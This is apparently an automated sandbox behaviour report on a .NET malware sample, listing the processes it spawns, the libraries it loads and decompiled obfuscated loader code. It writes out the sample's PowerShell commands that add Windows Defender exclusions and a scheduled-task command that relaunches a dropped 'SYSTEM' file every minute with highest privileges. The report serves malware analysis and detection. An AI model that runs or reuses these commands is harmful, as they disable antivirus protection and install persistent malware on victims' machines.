            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 72OWK7wBVH.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile read: C:\Users\user\Desktop\72OWK7wBVH.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\72OWK7wBVH.exe "C:\Users\user\Desktop\72OWK7wBVH.exe"
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
            Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\SYSTEM C:\Users\user\AppData\Roaming\SYSTEM
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: sxs.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: scrrun.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: linkinfo.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: ntshrui.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: cscapi.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: avicap32.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: msvfw32.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Section loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\SYSTEM | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: SYSTEM.lnk.0.dr | LNK file: ..\..\..\..\..\SYSTEM
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 72OWK7wBVH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 72OWK7wBVH.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.JjI3jOPHKJa4KNWkMwmixjQjB6tRRRR1BeEpy3VRYpipOTaaztVKethDsjsEhAwUYl2p7iFfpJp6,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.m7za2xKKtdegVwRedu3YPKn2kT6RbRuWPatbJBlhjPmmIZAX7UnKgf28TWitiE1sgJcWggUkpA3y,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.W0WkkCgllECDgzEV4cVnHods0Mc73xCs4cV19XZGzCuYmofHBx0ftqivava5AtsSfMMrfMTDCvl3,t54S0GB4g28qq8b7gcC4bvcMUEknn01rtwqhLSTxAmiYtWw2B8Z9D5T4niaLjaDUZObtAutvPp9d.Q5mwIQnwYANM2dbxwg5HRNvWqD4t1TyqzODXm3PmZT0f7q0wcvDmiRefQBFZdD3Nh2ZqCLC070Kd,dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk._5JJrp3YbG2wuYxMq1nbQi3VbvjPBUQjuP0UeIWNRwaBhZnz98cgQXyhni2RpVQtHR3zx63CgGog0jiXdM3jEa9BdsoJW2()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 72OWK7wBVH.exe, wiwBBGR9Uizn7StF0lr3BOKGNejV8lfkbr2QjufNHa7pV7TdkCff0cmdNgD8n.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{zQq3Lt6loepAZf8w58exR7HELs66xB1gr4ETjxu3CHETKzmAyKrQGulChtWUe[2],dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.p9G3RNlmH9EBEMqiJMtwR2r4nJYHvDjFp3E7fL3SLoYFB9xkHHOfZ5m2MOB2ZrxVLQfiWFap9jvM7fPNg2QraijykSQdV(Convert.FromBase64String(zQq3Lt6loepAZf8w58exR7HELs66xB1gr4ETjxu3CHETKzmAyKrQGulChtWUe[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
